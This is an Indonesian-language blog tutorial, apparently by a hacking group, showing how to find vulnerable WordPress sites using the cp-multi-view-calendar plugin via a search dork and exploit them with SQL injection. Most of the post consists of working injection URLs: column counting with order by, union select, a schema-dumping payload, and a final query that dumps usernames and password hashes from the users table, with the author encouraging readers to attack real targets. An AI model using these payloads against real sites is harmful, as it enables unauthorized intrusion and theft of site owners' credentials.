yoii kali ini kita maen suntik2an di CMS WordPress, maaf baru update, adminnya lagi pada sibuk maen ML akwkwak.
Dork : inurl:/wp-content/plugins/cp-multi-view-calendar
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
eXploit: 127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=<sql>
hackbar : disini saya menggunakan hackbar buatan sec7or, silahkan di download di sini
1. pertama silahkan cari target yang ingin di eksekusi, jika sudah menemukan target, coba dimasukan exploitnya hingga tampilan menjadi seperti berikut
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1’
3. jika terjadi blank kemungkinan bisa di exploitasi dengan sql injection, coba kita balance dulu dengan +--+
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1+--+
jika halaman tidak blank lagi, berarti balancenya bisa. |
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+
5. jika seperti gambar diatas, kita coba order by lagi
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+ →no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 2--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 3--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 10--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 15--+ → error
gotcha, error juga akwkwa |
sekarang kita coba cari angka ajaibnya dengan menggunakan union select
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
7. nah angka ajaibnya adalah 5,6 dan 10
sekarang kita exploitasi menggunakan DIOS nya mas madblood
contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14--+
8. dan boom~
Sekarang kita tinggal cari table usernya.
Jika sudah ketemu kita dump deh
contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,group_concat(user_login,0x3a,user_pass),11,12,13,14+from+wp_final_users--+
nah muncul kan tuh?
abis ini seterah ente mau diapain, Baca juga Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
Like, Comment, and Subscribe Channel Baru Kami: BadSector Channel
Oke sekian tutorial cupu dari saya :)
3xBitCh
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
0 komentar:
Posting Komentar